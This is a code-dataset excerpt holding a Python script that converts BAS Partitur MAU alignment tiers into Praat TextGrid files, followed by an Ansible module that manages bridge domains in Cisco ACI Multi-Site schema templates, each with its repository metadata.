"bytes": "73168"
},
{
"name": "LSL",
"bytes": "2080"
},
{
"name": "Lean",
"bytes": "213"
},
{
"name": "Lex",
"bytes": "264449"
},
{
"name": "Liquid",
"bytes": "1883"
},
{
"name": "LiveScript",
"bytes": "5747"
},
{
"name": "Lua",
"bytes": "78382"
},
{
"name": "M4",
"bytes": "1377"
},
{
"name": "MATLAB",
"bytes": "203"
},
{
"name": "Makefile",
"bytes": "269655"
},
{
"name": "Mako",
"bytes": "3614942"
},
{
"name": "Mask",
"bytes": "597"
},
{
"name": "Myghty",
"bytes": "936"
},
{
"name": "Nix",
"bytes": "2212"
},
{
"name": "OCaml",
"bytes": "539"
},
{
"name": "Objective-C",
"bytes": "2672"
},
{
"name": "OpenSCAD",
"bytes": "333"
},
{
"name": "PHP",
"bytes": "662"
},
{
"name": "PLSQL",
"bytes": "31565"
},
{
"name": "PLpgSQL",
"bytes": "6006"
},
{
"name": "Pascal",
"bytes": "1412"
},
{
"name": "Perl",
"bytes": "4327"
},
{
"name": "PigLatin",
"bytes": "371"
},
{
"name": "PowerShell",
"bytes": "3204"
},
{
"name": "Python",
"bytes": "76440000"
},
{
"name": "R",
"bytes": "2445"
},
{
"name": "Roff",
"bytes": "95764"
},
{
"name": "Ruby",
"bytes": "1098"
},
{
"name": "Rust",
"bytes": "495"
},
{
"name": "Scala",
"bytes": "1541"
},
{
"name": "Scheme",
"bytes": "559"
},
{
"name": "Shell",
"bytes": "190718"
},
{
"name": "Smarty",
"bytes": "130"
},
{
"name": "TSQL",
"bytes": "10013"
},
{
"name": "Tcl",
"bytes": "899"
},
{
"name": "TeX",
"bytes": "165743"
},
{
"name": "Thrift",
"bytes": "317058"
},
{
"name": "TypeScript",
"bytes": "1607"
},
{
"name": "VBA",
"bytes": "2884"
},
{
"name": "VBScript",
"bytes": "938"
},
{
"name": "VHDL",
"bytes": "830"
},
{
"name": "Vala",
"bytes": "485"
},
{
"name": "Verilog",
"bytes": "274"
},
{
"name": "Vim Snippet",
"bytes": "226931"
},
{
"name": "XQuery",
"bytes": "114"
},
{
"name": "XSLT",
"bytes": "521413"
},
{
"name": "Yacc",
"bytes": "2133855"
}
],
"symlink_target": ""
} |
import codecs
# Use regular expressions
import re
# Nice command line argument parsing
import argparse
# Module to check the properties of wave files
import wave
# Module to check files and paths
import os.path
import sys
# Create an command-line argument parser
parser = argparse.ArgumentParser(description="Convert the transcription in a BAS Partitur file with a MAU tier to the Praat TextGrid format.")
# Add arguments with sensible defaults to parser
parser.add_argument("inputfilename", help="the name of the input BAS Partitur file with MAU tier")
parser.add_argument("originalfilename", help="the name of the original BAS Partitur file")
parser.add_argument("outputfilename", help="the name of the output Praat TextGrid file")
parser.add_argument("-inputenc", "--inputenc", required=False, default="utf-8", help="the input character encoding to be used for the BAS Partitur file with MAU tier (defaults to UTF-8)")
parser.add_argument("-origenc", "--origenc", required=False, default="utf-8", help="the input character encoding to be used for the original BAS Partitur file (defaults to UTF-8)")
parser.add_argument("-outputenc", "--outputenc", required=False, default="utf-8", help="the output character encoding to be used (defaults to UTF-8)")
parser.add_argument("-wave", "--wave", required=False, help="the file name of the associated wave file")
parser.add_argument("-samplerate", "--samplerate", required=False, type=int, help="the sample rate of the associated wave file in Hz")
parser.add_argument("-debuglevel", "--debuglevel", required=False, default=1, type=int, choices=[0,1], help="the debug level to be used (0 --> no status messages, 1 --> print status messages)")
# Parse command-line arguments
args = vars(parser.parse_args())
# Process obligatory command-line arguments
input_file_name = args["inputfilename"]
original_file_name = args["originalfilename"]
output_file_name = args["outputfilename"]
# Process optional command-line arguments
input_encoding = args["inputenc"]
original_encoding = args["origenc"]
output_encoding = args["outputenc"]
sample_rate = args["samplerate"]
debug_level = args["debuglevel"]
# If a wave file was specified, test whether it exists
if "wave" in args and args["wave"] is not None:
wave_file_name = args["wave"]
if os.path.exists(wave_file_name) and os.path.isfile(wave_file_name):
# Try to open it with wave module
wave_file = wave.open(wave_file_name, "r")
# Try to determine its properties
sample_rate = wave_file.getframerate()
else:
wave_file_name = None
if sample_rate is None:
print("You either have to provide the path to the wave file or to specify the sample rate manually.")
sys.exit()
# Function to read in the ORT tier from a BAS Partitur file
# Arguments:
# 1. file name
# 2. encoding (defaults to utf-8)
# Returns a list of words as tuples (word_id, word)
def readORTFromOriginalBASFile(file_name, encoding="utf-8"):
bas_file = codecs.open(file_name,"r",encoding)
# Print status message
if debug_level == 1:
print("Extracting ORT tier from original BAS Partitur file", file_name)
# Make a new list of words
words = []
# Count line numbers for error reporting
line_number = 0
# Read the BAS Partitur file line by line
for line in bas_file:
# Increase line number
line_number += 1
# Remove superfluous whitespace
line = line.strip()
# Skip empty lines
if line == "": continue
# Test if the line contains information in the ORT tier
if line.startswith("ORT:"):
# Test whether the line can be divided into 3 elements:
# tier marker, word_id and word
elements = line.split()
if len(elements) != 3:
print("Found an ORT tier that does not contain 3 elements (tier marker, number, phoneme) in line:", line_number)
sys.exit()
# Unpack elements into separate variables
(tier_marker, word_id, word) = elements
# Append the current word into the list of words
# (also include the line number)
words.append((word_id, word))
# Close the file
bas_file.close()
# Return the list of words
return words
# Function to read in the KAN tier from a BAS Partitur file
# Arguments:
# 1. file name
# 2. encoding (defaults to utf-8)
# Returns a list of words as tuples (word_id, word)
def readKANFromOriginalBASFile(file_name, encoding="utf-8"):
bas_file = codecs.open(file_name,"r",encoding)
# Print status message
if debug_level == 1:
print("Extracting KAN tier from original BAS Partitur file", file_name)
# Make a new list of words
words = []
# Count line numbers for error reporting
line_number = 0
# Read the BAS Partitur file line by line
for line in bas_file:
# Increase line number
line_number += 1
# Remove superfluous whitespace
line = line.strip()
# Skip empty lines
if line == "": continue
# Test if the line contains information in the ORT tier
if line.startswith("KAN:"):
# Test whether the line can be divided into 3 elements:
# tier marker, word_id and word
elements = line.split()
if len(elements) < 3:
print("Found a KAN tier that does not contain at least 3 elements (tier marker, number, phoneme) in line:", line_number)
sys.exit()
if len(elements) == 3:
# Unpack elements into separate variables
(tier_marker, word_id, word) = elements
else:
# Unpack elements into separate variables
tier_marker = elements.pop(0)
word_id = elements.pop(0)
word = " ".join(elements)
# Append the current word into the list of words
# (also include the line number)
words.append((word_id, word))
# Close the file
bas_file.close()
# Return the list of words
return words
# Function to read in the MAU tier from a BAS Partitur file
# Arguments:
# 1. file name
# 2. encoding (defaults to utf-8)
# Returns a list of phonemes as tuples (phoneme_id, phoneme)
def readMAUFromBASFile(file_name, encoding="utf-8"):
bas_file = codecs.open(file_name,"r",encoding)
# Print status message
if debug_level == 1:
print("Extracting MAU tier from BAS Partitur file", file_name)
# Make a new list of words
phonemes = []
# Count line numbers for error reporting
line_number = 0
# Read the BAS Partitur file line by line
for line in bas_file:
# Increase line number
line_number += 1
# Remove superfluous whitespace
line = line.strip()
# Skip empty lines
if line == "": continue
# Test if the line contains information in the ORT tier
if line.startswith("MAU:"):
# Test whether the line can be divided into 5 elements:
# tier marker, start, duration, word_id, and phoneme
elements = line.split()
if len(elements) != 5:
print("Found a MAU tier that does not contain 5 elements (tier marker, start time, duration, word id, phoneme) in line:", line_number)
sys.exit()
# Unpack elements into separate variables
(tier_marker, start, duration, word_id, phoneme) = elements
# Append the current word into the list of words
# (also include the line number)
phonemes.append((start, duration, word_id, phoneme))
# Close the file
bas_file.close()
# Return the list of phonemes
return phonemes
# Function to read in the RID tier from a BAS Partitur file
# Arguments:
# 1. file name
# 2. encoding (defaults to utf-8)
# Returns a list of utterances as lists of [utterance_id, list of word_ids]
def readRIDFromOriginalBASFile(file_name, encoding="utf-8"):
bas_file = codecs.open(file_name,"r",encoding)
# Print status message
if debug_level == 1:
print("Extracting RID tier from Original BAS Partitur file", file_name)
# Make a new list of words
utterances = []
# Count line numbers for error reporting
line_number = 0
# Read the BAS Partitur file line by line
for line in bas_file:
# Increase line number
line_number += 1
# Remove superfluous whitespace
line = line.strip()
# Skip empty lines
if line == "": continue
# Test if the line contains information in the ORT tier
if line.startswith("RID:"):
# Test whether the line can be divided into 3 elements:
# tier marker, start, duration, word_id, and phoneme
elements = line.split()
if len(elements) < 3:
print("Found a RID tier that does not contain at least 3 elements (tier marker, word ids, utterance id) in line:", line_number)
sys.exit()
elif len(elements) == 3:
# Unpack elements into separate variables
(tier_marker, word_ids, utterance_id) = elements
else:
tier_marker = elements[0]
word_ids = elements[1]
utterance_id = " ".join(elements[2:])
# Split the word ids
list_of_word_ids = word_ids.split(",")
# Append the current utterance into the list of utterances
utterances.append([utterance_id, list_of_word_ids])
# Close the file
bas_file.close()
# Return the list of utterances
return utterances
# Function to combine the start and end times of phonemes into those for words
# Argument:
# 1. A list of phonemes as created by readMAUFromBASFile
# returns a dictionary from word ids to pairs of (start_time, end_time)
def combinePhonemesIntoWords(phonemes):
# Print status report
if debug_level == 1:
print("Combining phoneme start and end times into word start and end times.")
# Dictionary of word ids
word_ids = {}
# Go through list of phonemes
for (start, duration, word_id, phoneme) in phonemes:
# Ignore pauses, etc.
if word_id == "-1":
continue
# Determine whether phonemes of the current word have already been processed
if word_id in word_ids:
# Old start and end time
(old_start_time, old_end_time) = word_ids[word_id]
# Calculate the start and end times of the current phoneme
cur_start_time = int(start)
cur_end_time = int(start) + int(duration)
# Is the current phoneme's start time lower than the old word start time?
if cur_start_time < old_start_time:
new_start_time = cur_start_time
else:
new_start_time = old_start_time
# Is the current phoneme's end time higher than the old word end time?
if cur_end_time > old_end_time:
new_end_time = cur_end_time
else:
new_end_time = old_end_time
# Put updated start and end time into dictionary
word_ids[word_id] = (new_start_time, new_end_time)
else:
new_start_time = int(start)
new_end_time = int(start) + int(duration)
# Put initial start and end time into dictionary
word_ids[word_id] = (new_start_time, new_end_time)
# Return the dictionary of start and end times for words
return word_ids
# Function to combine the start and end times of words into those for utterances
# Arguments:
# 1. A list of utterances as created by readRIDFromOriginalBASFile
# 2. A dictionary of word start and end times as created by combinePhonemesIntoWords
# returns a dictionary from utterance ids to pairs of (start_time, end_time)
def combineWordsIntoUtterances(utterances, words):
# Print status report
if debug_level == 1:
print("Combining word start and end times into utterance start and end times.")
# Dictionary of utterance ids
utterance_ids = {}
# Go trough the list of utterances
for utterance in utterances:
utterance_id = utterance[0]
list_of_word_ids = utterance[1]
# print("Utterance id is", utterance_id)
# print("List of word ids is", list_of_word_ids)
# Look up the start time of the first and last words in the utterance
first_word_id = list_of_word_ids[0]
last_word_id = list_of_word_ids[-1]
# Determine the start and end times of these words
if first_word_id in words:
(first_word_start_time, first_word_end_time) = words[first_word_id]
else:
print("Could not find word id", first_word_id, "contained in utterance id", utterance_id)
sys.exit()
if last_word_id in words:
(last_word_start_time, last_word_end_time) = words[last_word_id]
else:
print("Could not find word id", last_word_id, "contained in utterance id", utterance_id)
sys.exit()
# Combine start time of first word and end time of last word into
# utterance start and end times
utterance_start_time = first_word_start_time
utterance_end_time = last_word_end_time
# Put the utterance start and end times into the utterance dictionary
utterance_ids[utterance_id] = (utterance_start_time, utterance_end_time)
# Return the dictionary of start and end times for utterances
return utterance_ids
# Function to determine the minimal start time for words or utterances
# Argument:
# 1. A dictionary of ids with values of (start time, end time)
# returns the minimal start time
def getMinimalStartTime(id_dict):
# Current minimal start time
min_start_time = -1
# Go through all entries in the dictionary
for entry in id_dict:
cur_start_time = id_dict[entry][0]
# If no start time has been looked at yet
if min_start_time == -1:
min_start_time = cur_start_time
else:
# Is the current start time lower than the lowest value seen yet
if cur_start_time < min_start_time:
# Then take it as the new minimal start time
min_start_time = cur_start_time
# Return the minimal start time found
return min_start_time
# Function to determine the maximal end time for words or utterances
# Argument:
# 1. A dictionary of ids with values of (start time, end time)
# returns the maximal end time
def getMaximalEndTime(id_dict):
# Current maximal end time
max_end_time = -1
# Go through all entries in the dictionary
for entry in id_dict:
cur_end_time = id_dict[entry][1]
# If no end time has been looked at yet
if max_end_time == -1:
max_end_time = cur_end_time
else:
# Is the current end time higher than the highest value seen yet
if cur_end_time > max_end_time:
# Then take it as the new maximal end time
max_end_time = cur_end_time
# Return the maximal end time found
return max_end_time
# Function to produce a dictionary from word ids to the orthographic forms of words
# Argument:
# 1. A list of words as produced by readORTFromOriginalBASFile
# returns a dictionary from word ids to ortographic word forms
def makeWordDictionary(list_of_words):
# A dictionary of words
word_dict = {}
# Go through the list of words
for (word_id, word) in list_of_words:
# Put the word into the dictionary
word_dict[word_id] = word
# Return the dictionary
return word_dict
# Function to print a Praat TextGrid header
# Arguments:
# 1. Filehandle of the file to print to
# 2. The number of tiers to be printed
# 3. The start time (usually 0)
# 4. The end time
# 5. The sample rate (in order to convert MAU times into seconds)
def printPraatTextGridHeader(file_handle, num_tiers, start_time, end_time, sample_rate=sample_rate):
# Print the TextGrid header
print("File type = \"ooTextFile\"", file=file_handle)
print("Object class = \"TextGrid\"", file=file_handle)
# Print empty line
print(file=file_handle)
# Calculate start time in seconds
start_time_seconds = round(start_time / sample_rate, 3)
# Calculate end time in seconds
end_time_seconds = round(end_time / sample_rate, 3)
print("xmin =", "%.3f" % start_time_seconds, file=file_handle)
print("xmax =", "%.3f" % end_time_seconds, file=file_handle)
print("tiers? <exists>", file=file_handle)
print("size =", str(num_tiers), file=file_handle)
# Print first line of tiers list
print("item []:", file=file_handle)
# Print status report
if debug_level == 1:
print("Printing Praat TextGrid header to output file", output_file_name)
# Function to print the UTT(erance) tier
# Arguments:
# 1. The file handle
# 2. The list of UTTERANCES words as produced by readRIDFromOriginalBASFile
# 3. A dictionary from utterance ids to start and end times
# 4. A dictionary from word ids to orthographic word forms
# 5. The number of the tier in the TextGrid file
# 6. The start time (usually 0)
# 7. The end time
# 8. The sample rate (in order to convert MAU times into seconds)
def printUTT(file_handle, utterance_list, utterance_times, word_dict, tier_number, start_time, end_time, sample_rate = sample_rate):
# Print status report
if debug_level == 1:
print("Printing UTT (utterances) tier.")
# Output header for current tier
print("\titem [" + str(tier_number) + "]:", file=file_handle)
print("\t\tclass = \"IntervalTier\"", file=file_handle)
print("\t\tname = \"UTT\"", file=file_handle)
# Calculate start time in seconds
start_time_seconds = round(start_time / sample_rate, 3)
# Calculate end time in seconds
end_time_seconds = round(end_time / sample_rate, 3)
print("\t\txmin =", "%.3f" % start_time_seconds, file=file_handle)
print("\t\txmax =", "%.3f" % end_time_seconds, file=file_handle)
# Determine the number of utterances
number_of_utterances = len(utterance_list)
print("\t\tintervals: size =", str(number_of_utterances), file=file_handle)
# Output the individual intervals
interval_number = 0
# Go through the list of utterances
for utterance in utterance_list:
# Increase interval number
interval_number += 1
utterance_id = utterance[0]
word_ids = utterance[1]
# Look up the utterance start and end times
if utterance_id in utterance_times:
utterance_start_time = utterance_times[utterance_id][0]
utterance_end_time = utterance_times[utterance_id][1]
# Calculate start time in seconds
utterance_start_time_seconds = round(utterance_start_time / sample_rate, 3)
# Calculate end time in seconds
utterance_end_time_seconds = round(utterance_end_time / sample_rate, 3)
else:
print("Could not determine utterance start and end times for utterance", utterance_id)
sys.exit()
# Look up the words in the utterance
words = []
for word_id in word_ids:
# Look up the word_id in the dictionary
if word_id in word_dict:
words.append(word_dict[word_id])
else:
print("Could not found orthographic form of word id", word_id)
sys.exit()
# Combine words into utterance text
utterance_text = " ".join(words)
# Output the interval for the current utterance
print("\t\tintervals [" + str(interval_number) + "]:", file=file_handle)
print("\t\t\txmin =", "%.3f" % utterance_start_time_seconds, file=file_handle)
print("\t\t\txmax =", "%.3f" % utterance_end_time_seconds, file=file_handle)
print("\t\t\ttext =", utterance_text, file=file_handle)
# Function to print the ORT(hography) tier
# Arguments:
# 1. The file handle
# 2. The list of ORT words as produced by readORTFromOriginalBASFile
# 3. A dictionary from word ids to start and end times
# 4. The number of the tier in the TextGrid file
# 5. The start time (usually 0)
# 6. The end time
# 7. The sample rate (in order to convert MAU times into seconds)
def printORT(file_handle, ort_list, word_times, tier_number, start_time, end_time, sample_rate = sample_rate):
# Print status report
if debug_level == 1:
print("Printing ORT (orthography) tier.")
# Output header for current tier
print("\titem [" + str(tier_number) + "]:", file=file_handle)
print("\t\tclass = \"IntervalTier\"", file=file_handle)
print("\t\tname = \"ORT\"", file=file_handle)
# Calculate start time in seconds
start_time_seconds = round(start_time / sample_rate, 3)
# Calculate end time in seconds
end_time_seconds = round(end_time / sample_rate, 3)
print("\t\txmin =", "%.3f" % start_time_seconds, file=file_handle)
print("\t\txmax =", "%.3f" % end_time_seconds, file=file_handle)
# Determine the number of words
number_of_words = len(ort_list)
print("\t\tintervals: size =", str(number_of_words), file=file_handle)
# Output the individual intervals
interval_number = 0
# Go through the list of words
for word in ort_list:
# Increase interval number
interval_number += 1
word_id = word[0]
word_ort = word[1]
# Look up the word start and end times
if word_id in word_times:
word_start_time = word_times[word_id][0]
word_end_time = word_times[word_id][1]
# Calculate start time in seconds
word_start_time_seconds = round(word_start_time / sample_rate, 3)
# Calculate end time in seconds
word_end_time_seconds = round(word_end_time / sample_rate, 3)
else:
print("Could not determine word start and end times for word", word_id)
sys.exit()
# Output the interval for the current word
print("\t\tintervals [" + str(interval_number) + "]:", file=file_handle)
print("\t\t\txmin =", "%.3f" % word_start_time_seconds, file=file_handle)
print("\t\t\txmax =", "%.3f" % word_end_time_seconds, file=file_handle)
print("\t\t\ttext =", word_ort, file=file_handle)
# Function to print the KAN (canonical transcription) tier
# Arguments:
# 1. The file handle
# 2. The list of KAN words as produced by readKANFromOriginalBASFile
# 3. A dictionary from word ids to start and end times
# 4. The number of the tier in the TextGrid file
# 5. The start time (usually 0)
# 6. The end time
# 7. The sample rate (in order to convert MAU times into seconds)
def printKAN(file_handle, kan_list, word_times, tier_number, start_time, end_time, sample_rate = sample_rate):
# Print status report
if debug_level == 1:
print("Printing KAN (canonical transcription) tier.")
# Output header for current tier
print("\titem [" + str(tier_number) + "]:", file=file_handle)
print("\t\tclass = \"IntervalTier\"", file=file_handle)
print("\t\tname = \"KAN\"", file=file_handle)
# Calculate start time in seconds
start_time_seconds = round(start_time / sample_rate, 3)
# Calculate end time in seconds
end_time_seconds = round(end_time / sample_rate, 3)
print("\t\txmin =", "%.3f" % start_time_seconds, file=file_handle)
print("\t\txmax =", "%.3f" % end_time_seconds, file=file_handle)
# Determine the number of words
number_of_words = len(kan_list)
print("\t\tintervals: size =", str(number_of_words), file=file_handle)
# Output the individual intervals
interval_number = 0
# Go through the list of words
for word in kan_list:
# Increase interval number
interval_number += 1
word_id = word[0]
word_kan = word[1]
# Look up the word start and end times
if word_id in word_times:
word_start_time = word_times[word_id][0]
word_end_time = word_times[word_id][1]
# Calculate start time in seconds
word_start_time_seconds = round(word_start_time / sample_rate, 3)
# Calculate end time in seconds
word_end_time_seconds = round(word_end_time / sample_rate, 3)
else:
print("Could not determine word start and end times for word", word_id)
sys.exit()
# Output the interval for the current word
print("\t\tintervals [" + str(interval_number) + "]:", file=file_handle)
print("\t\t\txmin =", "%.3f" % word_start_time_seconds, file=file_handle)
print("\t\t\txmax =", "%.3f" % word_end_time_seconds, file=file_handle)
print("\t\t\ttext =", word_kan, file=file_handle)
# Function to print the MAU (time-aligned phoneme) tier
# Arguments:
# 1. The file handle
# 2. The list of MAU phonemes as produced by readMAUFromBASFile
# 3. The number of the tier in the TextGrid file
# 4. The start time (usually 0)
# 5. The end time
# 6. The sample rate (in order to convert MAU times into seconds)
def printMAU(file_handle, mau_list, tier_number, start_time, end_time, sample_rate = sample_rate):
# Print status report
if debug_level == 1:
print("Printing MAU (time-aligned phoneme) tier.")
# Output header for current tier
print("\titem [" + str(tier_number) + "]:", file=file_handle)
print("\t\tclass = \"IntervalTier\"", file=file_handle)
print("\t\tname = \"MAU\"", file=file_handle)
# Calculate start time in seconds
start_time_seconds = round(start_time / sample_rate, 3)
# Calculate end time in seconds
end_time_seconds = round(end_time / sample_rate, 3)
print("\t\txmin =", "%.3f" % start_time_seconds, file=file_handle)
print("\t\txmax =", "%.3f" % end_time_seconds, file=file_handle)
# Determine the number of phonemes
number_of_phonemes = len(mau_list)
print("\t\tintervals: size =", str(number_of_phonemes), file=file_handle)
# Output the individual intervals
interval_number = 0
# Go through the list of phonemes
for phoneme in mau_list:
# Increase interval number
interval_number += 1
phoneme_start_time = int(phoneme[0])
phoneme_end_time = phoneme_start_time + int(phoneme[1])
phoneme_text = phoneme[3]
# Calculate start time in seconds
phoneme_start_time_seconds = round(phoneme_start_time / sample_rate, 3)
# Calculate end time in seconds
phoneme_end_time_seconds = round(phoneme_end_time / sample_rate, 3)
# Output the interval for the current phoneme
print("\t\tintervals [" + str(interval_number) + "]:", file=file_handle)
print("\t\t\txmin =", "%.3f" % phoneme_start_time_seconds, file=file_handle)
print("\t\t\txmax =", "%.3f" % phoneme_end_time_seconds, file=file_handle)
print("\t\t\ttext =", str(phoneme_text), file=file_handle)
# Print status report
if debug_level == 1:
print("Converting BAS Partitur file", input_file_name, "to Praat TextGrid file", output_file_name, "using the ORT, KAN, and RID tiers from", original_file_name + ".")
# Read in the ORT tier from the original BAS Partitur file
ort_tier = readORTFromOriginalBASFile(original_file_name, original_encoding)
# Read in the KAN tier from the original BAS Partitur file
kan_tier = readKANFromOriginalBASFile(original_file_name, original_encoding)
# Read in the RID tier from the original BAS Partitur file
rid_tier = readRIDFromOriginalBASFile(original_file_name, original_encoding)
# Read in the MAU tier from the BAS Partitur file
mau_tier = readMAUFromBASFile(input_file_name, input_encoding)
# Combine phoneme start and end times into word start and end times
word_times = combinePhonemesIntoWords(mau_tier)
# Combine word start and end times into utterance start and end times
utterance_times = combineWordsIntoUtterances(rid_tier, word_times)
# Determine start time of the first word and the end time of the last word
min_word_start_time = getMinimalStartTime(word_times)
max_word_end_time = getMaximalEndTime(word_times)
# Determine start time of the first utterance and the end time of the last utterance
min_utterance_start_time = getMinimalStartTime(utterance_times)
max_utterance_end_time = getMaximalEndTime(utterance_times)
# Make a dictionary from word ids to word forms
word_dict = makeWordDictionary(ort_tier)
# Create output file
output_file = codecs.open(output_file_name, "w", output_encoding)
# Determine absolute start and end times
# Start time of the first phoneme
first_phoneme = mau_tier[0]
absolute_start_time = int(first_phoneme[0])
last_phoneme = mau_tier[-1]
absolute_end_time = int(last_phoneme[0]) + int(last_phoneme[1])
# Print Praat TextGrid header
printPraatTextGridHeader(output_file, start_time = absolute_start_time, end_time = absolute_end_time, num_tiers = 4)
# Print utterance tier (UTT)
printUTT(output_file, rid_tier, utterance_times, word_dict, tier_number = 1, start_time = min_utterance_start_time, end_time = max_utterance_end_time)
# Print orthography tier (ORT)
printORT(output_file, ort_tier, word_times, tier_number = 2, start_time = min_word_start_time, end_time = max_word_end_time)
# Print canonical transcription tier (KAN)
printKAN(output_file, kan_tier, word_times, tier_number = 3, start_time = min_word_start_time, end_time = max_word_end_time)
# Print automatically time-aligned phoneme tier (MAU)
printMAU(output_file, mau_tier, tier_number = 4, start_time = absolute_start_time, end_time = absolute_end_time)
# Close output file
output_file.close()
| {
"content_hash": "a3de629414688234bd74dd5d9beb4a86",
"timestamp": "",
"source": "github",
"line_count": 867,
"max_line_length": 193,
"avg_line_length": 36.089965397923876,
"alnum_prop": 0.6217961009907319,
"repo_name": "janstrunk/LangDocMAUS",
"id": "3973df2d7e7c15703a90c5f6290d455b9adb91f9",
"size": "32060",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "MAU2TextGrid.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "2339"
},
{
"name": "Python",
"bytes": "168231"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: mso_schema_template_bd
short_description: Manage Bridge Domains (BDs) in schema templates
description:
- Manage BDs in schema templates on Cisco ACI Multi-Site.
author:
- Dag Wieers (@dagwieers)
version_added: '2.8'
options:
schema:
description:
- The name of the schema.
type: str
required: yes
template:
description:
- The name of the template.
type: str
required: yes
bd:
description:
- The name of the BD to manage.
type: str
aliases: [ name ]
display_name:
description:
- The name as displayed on the MSO web interface.
type: str
vrf:
description:
- The VRF associated to this BD. This is required only when creating a new BD.
type: dict
suboptions:
name:
description:
- The name of the VRF to associate with.
required: true
type: str
schema:
description:
- The schema that defines the referenced VRF.
- If this parameter is unspecified, it defaults to the current schema.
type: str
template:
description:
- The template that defines the referenced VRF.
- If this parameter is unspecified, it defaults to the current template.
type: str
subnets:
description:
- The subnets associated to this BD.
type: list
suboptions:
subnet:
description:
- The IP range in CIDR notation.
type: str
required: true
aliases: [ ip ]
description:
description:
- The description of this subnet.
type: str
scope:
description:
- The scope of the subnet.
type: str
choices: [ private, public ]
shared:
description:
- Whether this subnet is shared between VRFs.
type: bool
no_default_gateway:
description:
- Whether this subnet has a default gateway.
type: bool
intersite_bum_traffic:
description:
- Whether to allow intersite BUM traffic.
type: bool
optimize_wan_bandwidth:
description:
- Whether to optimize WAN bandwidth.
type: bool
layer2_stretch:
description:
- Whether to enable L2 stretch.
type: bool
layer2_unknown_unicast:
description:
- Layer2 unknown unicast.
type: str
choices: [ flood, proxy ]
layer3_multicast:
description:
- Whether to enable L3 multicast.
type: bool
state:
description:
- Use C(present) or C(absent) for adding or removing.
- Use C(query) for listing an object or multiple objects.
type: str
choices: [ absent, present, query ]
default: present
extends_documentation_fragment: mso
'''
EXAMPLES = r'''
- name: Add a new BD
mso_schema_template_bd:
host: mso_host
username: admin
password: SomeSecretPassword
schema: Schema 1
template: Template 1
bd: BD 1
vrf:
name: VRF1
state: present
delegate_to: localhost
- name: Remove an BD
mso_schema_template_bd:
host: mso_host
username: admin
password: SomeSecretPassword
schema: Schema 1
template: Template 1
bd: BD1
state: absent
delegate_to: localhost
- name: Query a specific BDs
mso_schema_template_bd:
host: mso_host
username: admin
password: SomeSecretPassword
schema: Schema 1
template: Template 1
bd: BD1
state: query
delegate_to: localhost
register: query_result
- name: Query all BDs
mso_schema_template_bd:
host: mso_host
username: admin
password: SomeSecretPassword
schema: Schema 1
template: Template 1
state: query
delegate_to: localhost
register: query_result
'''
RETURN = r'''
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.aci.mso import MSOModule, mso_argument_spec, mso_reference_spec, mso_subnet_spec
def main():
argument_spec = mso_argument_spec()
argument_spec.update(
schema=dict(type='str', required=True),
template=dict(type='str', required=True),
bd=dict(type='str', aliases=['name']), # This parameter is not required for querying all objects
display_name=dict(type='str'),
intersite_bum_traffic=dict(type='bool'),
optimize_wan_bandwidth=dict(type='bool'),
layer2_stretch=dict(type='bool'),
layer2_unknown_unicast=dict(type='str', choices=['flood', 'proxy']),
layer3_multicast=dict(type='bool'),
vrf=dict(type='dict', options=mso_reference_spec()),
subnets=dict(type='list', options=mso_subnet_spec()),
state=dict(type='str', default='present', choices=['absent', 'present', 'query']),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
required_if=[
['state', 'absent', ['bd']],
['state', 'present', ['bd', 'vrf']],
],
)
schema = module.params['schema']
template = module.params['template']
bd = module.params['bd']
display_name = module.params['display_name']
intersite_bum_traffic = module.params['intersite_bum_traffic']
optimize_wan_bandwidth = module.params['optimize_wan_bandwidth']
layer2_stretch = module.params['layer2_stretch']
layer2_unknown_unicast = module.params['layer2_unknown_unicast']
layer3_multicast = module.params['layer3_multicast']
vrf = module.params['vrf']
subnets = module.params['subnets']
state = module.params['state']
mso = MSOModule(module)
# Get schema_id
schema_obj = mso.get_obj('schemas', displayName=schema)
if schema_obj:
schema_id = schema_obj['id']
else:
mso.fail_json(msg="Provided schema '{0}' does not exist".format(schema))
schema_path = 'schemas/{id}'.format(**schema_obj)
# Get template
templates = [t['name'] for t in schema_obj['templates']]
if template not in templates:
mso.fail_json(msg="Provided template '{0}' does not exist. Existing templates: {1}".format(template, ', '.join(templates)))
template_idx = templates.index(template)
# Get ANP
bds = [b['name'] for b in schema_obj['templates'][template_idx]['bds']]
if bd is not None and bd in bds:
bd_idx = bds.index(bd)
mso.existing = schema_obj['templates'][template_idx]['bds'][bd_idx]
if state == 'query':
if bd is None:
mso.existing = schema_obj['templates'][template_idx]['bds']
elif not mso.existing:
mso.fail_json(msg="BD '{bd}' not found".format(bd=bd))
mso.exit_json()
bds_path = '/templates/{0}/bds'.format(template)
bd_path = '/templates/{0}/bds/{1}'.format(template, bd)
ops = []
mso.previous = mso.existing
if state == 'absent':
if mso.existing:
mso.sent = mso.existing = {}
ops.append(dict(op='remove', path=bd_path))
elif state == 'present':
vrf_ref = mso.make_reference(vrf, 'vrf', schema_id, template)
subnets = mso.make_subnets(subnets)
if display_name is None and not mso.existing:
display_name = bd
if subnets is None and not mso.existing:
subnets = []
payload = dict(
name=bd,
displayName=display_name,
intersiteBumTrafficAllow=intersite_bum_traffic,
optimizeWanBandwidth=optimize_wan_bandwidth,
l2UnknownUnicast=layer2_unknown_unicast,
l2Stretch=layer2_stretch,
l3MCast=layer3_multicast,
subnets=subnets,
vrfRef=vrf_ref,
)
mso.sanitize(payload, collate=True)
if mso.existing:
ops.append(dict(op='replace', path=bd_path, value=mso.sent))
else:
ops.append(dict(op='add', path=bds_path + '/-', value=mso.sent))
mso.existing = mso.proposed
if not module.check_mode:
mso.request(schema_path, method='PATCH', data=ops)
mso.exit_json()
if __name__ == "__main__":
main()
| {
"content_hash": "ed0eb11c2c9cae64cd975aeff326da49",
"timestamp": "",
"source": "github",
"line_count": 289,
"max_line_length": 131,
"avg_line_length": 28.5121107266436,
"alnum_prop": 0.6192961165048544,
"repo_name": "thaim/ansible",
"id": "72d5f9c7b371e2d3355ad4fb6f27c2d64fae6718",
"size": "8441",
"binary": false,
"copies": "5",
"ref": "refs/heads/fix-broken-link",
"path": "lib/ansible/modules/network/aci/mso_schema_template_bd.py",
"mode": "33188",
"license": "mit",
